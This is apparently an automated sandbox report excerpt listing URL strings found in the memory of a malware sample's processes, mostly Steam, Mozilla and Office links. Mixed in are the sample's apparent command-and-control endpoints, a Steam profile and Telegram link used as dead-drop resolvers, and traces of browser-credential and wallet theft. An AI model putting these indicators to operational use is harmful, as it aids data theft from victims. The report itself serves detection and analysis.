Source: DGCAAFBFBKFIDGDHJDBK.15.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mysterisop.site:443/api1K
Source: RegAsm.exe, 00000009.00000002.2366798957.0000000001031000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.2541358751.00000000012C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://questionsmw.store/api
Source: RegAsm.exe, 00000009.00000002.2366798957.0000000001031000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://questionsmw.store/api2
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://skeab.c
Source: RegAsm.exe, 0000001C.00000002.2542151523.0000000001333000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://snarlypagowo.site/
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://snarlypagowo.site/apie
Source: RegAsm.exe, 0000001C.00000002.2541722970.00000000012FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://snarlypagowo.site/apig)P
Source: 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/%Z
Source: RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000E71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/ByG
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000E71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/JyO
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/f
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/n
Source: RegAsm.exe, 0000001C.00000002.2541722970.00000000012ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: RegAsm.exe, 0000001C.00000002.2541722970.00000000012ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900q
Source: file.exe, 00000000.00000002.1666233856.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2337029963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJEGDBKFIJ.exe, 0000000A.00000002.2293601659.000000000346B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.000000000115F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000437000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611997804188699
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000E71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869L
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869iI1
Source: file.exe, 00000000.00000002.1666233856.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJEGDBKFIJ.exe, 0000000A.00000002.2293601659.000000000346B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000437000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000E71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869z
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: FHIDAF.2.dr String found in binary or memory: https://support.mozilla.org
Source: FHIDAF.2.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FHIDAF.2.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000002.00000002.2347796347.0000000019ABD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2746964105.00000000197DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000063B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.0000000001260000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2596282992.000000001C18D000.00000004.00000020.00020000.00000000.sdmp, AKFHDB.2.dr, AAKEGD.12.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: RegAsm.exe, 0000000F.00000002.2759155964.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: RegAsm.exe, 0000000F.00000002.2759155964.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: AKFHDB.2.dr, AAKEGD.12.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 0000000C.00000002.2737816539.000000000063B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 0000000C.00000002.2737816539.000000000063B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016xe
Source: RegAsm.exe, 00000002.00000002.2347796347.0000000019ABD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2746964105.00000000197DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000063B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.0000000001260000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2596282992.000000001C18D000.00000004.00000020.00020000.00000000.sdmp, AKFHDB.2.dr, AAKEGD.12.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e171
Source: AKFHDB.2.dr, AAKEGD.12.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17host.exe
Source: RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: RegAsm.exe, 0000000C.00000002.2737816539.000000000063B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1666233856.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2337029963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJEGDBKFIJ.exe, 0000000A.00000002.2293601659.000000000346B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000437000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://treatynreit.site/api
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2782993650.00000000277AF000.00000004.00000020.00020000.00000000.sdmp, DGCAAFBFBKFIDGDHJDBK.15.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 00000002.00000002.2367073275.00000000204D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2382470007.0000000032328000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2372826674.0000000026447000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2394990249.000000003E206000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3[1].dll.15.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, freebl3[1].dll.15.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, AFCAAE.2.dr, EGIDAAFI.15.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 66fbfcc9963ca_ldfsna[1].exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.2.dr, IIJKJDAFHJ.exe.2.dr, 66fbfccd837ac_vadggdsa[1].exe.15.dr, userBAAAAKJKJE.exe.15.dr, GDBFCGIIIJ.exe.2.dr, 66fbfcc9963ca_ldfsna[1].exe.15.dr, KJEGDBKFIJ.exe.2.dr String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2782993650.00000000277AF000.00000004.00000020.00020000.00000000.sdmp, DGCAAFBFBKFIDGDHJDBK.15.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, AFCAAE.2.dr, EGIDAAFI.15.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FHIDAF.2.dr String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000002.00000002.2347796347.0000000019ABD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: FHIDAF.2.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000002.00000002.2347796347.0000000019ABD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: FHIDAF.2.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000002.00000002.2347796347.0000000019ABD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: FHIDAF.2.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: FHIDAF.2.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000002.00000002.2347796347.0000000019ABD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2759155964.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000002.00000002.2337029963.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
